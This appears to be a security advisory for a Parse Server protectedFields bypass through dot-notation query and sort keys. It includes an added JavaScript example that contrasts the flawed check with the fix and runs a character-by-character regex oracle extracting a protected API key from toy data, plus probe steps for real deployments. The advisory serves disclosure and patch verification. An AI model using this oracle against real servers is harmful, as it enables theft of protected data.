GHSA-r2m8-pxm9-9c4g

Source
https://github.com/advisories/GHSA-r2m8-pxm9-9c4g
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-r2m8-pxm9-9c4g/GHSA-r2m8-pxm9-9c4g.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-r2m8-pxm9-9c4g
Aliases
Published
2026-03-11T00:34:59Z
Modified
2026-03-13T13:10:57.234333Z
Severity
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Summary
Parse Server has a protected fields bypass via dot-notation in query and sort
Details

Impact

The protectedFields class-level permission (CLP) can be bypassed by using dot-notation in query where clauses and sort parameters. The check compared the full query or sort key against the list of protected fields, so a sub-field path such as secretObj.apiKey did not match the protected root field secretObj. An attacker can therefore query or sort on sub-fields of a protected field, and because each such query either matches or does not, the responses form a binary oracle that lets the attacker enumerate the protected field's values.

This affects both MongoDB and PostgreSQL deployments.

Patches

The fix ensures that query WHERE clause keys and sort keys are checked against protected fields by extracting the root field from dot-notation paths. For example, a query on secretObj.apiKey is now correctly blocked when secretObj is a protected field.
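The following is an added example, not code from Parse Server or from this advisory. It models the root-field check described in the Patches section beside the full-key comparison it replaces, and shows why the sub-field query matters by running a prefix-guessing count oracle, of the binary kind described under Impact, against a toy in-memory record. The REST-style order string with a leading "-" for descending, the recursion into $or/$and/$nor sub-queries, the protected field name secretObj, the sample record and the API key value are assumptions or constructed sample data, not details taken from the advisory.

```javascript
// Added example, not Parse Server's own code: a model of the protectedFields
// key check before and after the fix described in the advisory, plus the
// prefix-guessing oracle that the unfixed check lets through.
// Assumptions (not from the advisory): a REST-style "order" string where a
// leading "-" means descending, and where clauses that may nest sub-queries
// under $or / $and / $nor.

// Hypothetical CLP: the whole "secretObj" field is protected.
const PROTECTED = new Set(['secretObj']);

// Unfixed behaviour as described in the advisory: only an exact key match is
// blocked, so "secretObj.apiKey" slips past while "secretObj" does not.
function isProtectedNaive(key, protectedFields) {
  return protectedFields.has(key);
}

// Fixed behaviour: reduce a dot-notation path to its root field first.
function rootField(key) {
  const bare = key.startsWith('-') ? key.slice(1) : key; // strip sort direction
  return bare.split('.')[0];
}
function isProtectedFixed(key, protectedFields) {
  return protectedFields.has(rootField(key));
}

// Every field key referenced by a where clause, including nested sub-queries.
function whereKeys(where, out = []) {
  for (const [k, v] of Object.entries(where)) {
    if (k === '$or' || k === '$and' || k === '$nor') v.forEach(sub => whereKeys(sub, out));
    else out.push(k);
  }
  return out;
}

// Keys in `where` or `order` that the given check rejects.
function findViolations(where, order, protectedFields, isProtected) {
  const keys = whereKeys(where).concat(order ? order.split(',') : []);
  return keys.filter(k => isProtected(k, protectedFields));
}

// --- Toy count endpoint standing in for a Parse count query ----------------
// Constructed sample data; the API key value is invented for the demo.
const ROWS = [{ objectId: 'abc123', secretObj: { apiKey: 'k9f2' } }];

function getPath(obj, path) {
  return path.split('.').reduce((o, p) => (o == null ? undefined : o[p]), obj);
}

// Supports equality and {$regex} constraints only; enough for the oracle.
function matches(row, where) {
  return Object.entries(where).every(([field, cond]) => {
    const val = getPath(row, field);
    if (cond && typeof cond === 'object' && '$regex' in cond) {
      return typeof val === 'string' && new RegExp(cond.$regex).test(val);
    }
    return val === cond;
  });
}

// Returns a count endpoint that enforces protectedFields with the given check.
function makeCountEndpoint(isProtected) {
  return where => {
    if (findViolations(where, null, PROTECTED, isProtected).length > 0) {
      throw new Error('Permission denied: query on protected field');
    }
    return ROWS.filter(r => matches(r, where)).length;
  };
}

// --- Attacker side: recover the value one character at a time --------------
const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789';
const escapeRe = s => s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');

// Each probe asks "does secretObj.apiKey start with <prefix><c>?"; the count
// (0 or 1) is the binary oracle. Returns null if the endpoint refuses.
function extractApiKey(count) {
  let prefix = '';
  try {
    for (;;) {
      const next = ALPHABET.split('').find(
        c => count({ 'secretObj.apiKey': { $regex: '^' + escapeRe(prefix + c) } }) > 0
      );
      if (next === undefined) return prefix;
      prefix += next;
    }
  } catch (e) {
    return null;
  }
}

console.log('unfixed check leaks:', extractApiKey(makeCountEndpoint(isProtectedNaive))); // "k9f2"
console.log('fixed check leaks:', extractApiKey(makeCountEndpoint(isProtectedFixed)));   // null
```

The same probe is the simplest way to confirm a real deployment is patched: as an unprivileged client, send a find or count whose where clause, or whose order parameter, names a sub-field of a field listed in protectedFields. A patched server rejects the request; an unpatched one answers it, and the answer is the oracle.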

Workarounds

None.

References

  • GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-r2m8-pxm9-9c4g
  • Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.6
  • Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.32
Database specific
{
    "nvd_published_at": "2026-03-11T18:16:26Z",
    "github_reviewed_at": "2026-03-11T00:34:59Z",
    "cwe_ids": [
        "CWE-284"
    ],
    "severity": "HIGH",
    "github_reviewed": true
}
Affected packages

npm / parse-server
  Affected ranges (SEMVER): introduced 9.0.0-alpha.1, fixed 9.6.0-alpha.6
  Database specific: source "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-r2m8-pxm9-9c4g/GHSA-r2m8-pxm9-9c4g.json"

npm / parse-server
  Affected ranges (SEMVER): introduced 0 (unknown introduced version; all previous versions are affected), fixed 8.6.32
  Database specific: source "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-r2m8-pxm9-9c4g/GHSA-r2m8-pxm9-9c4g.json"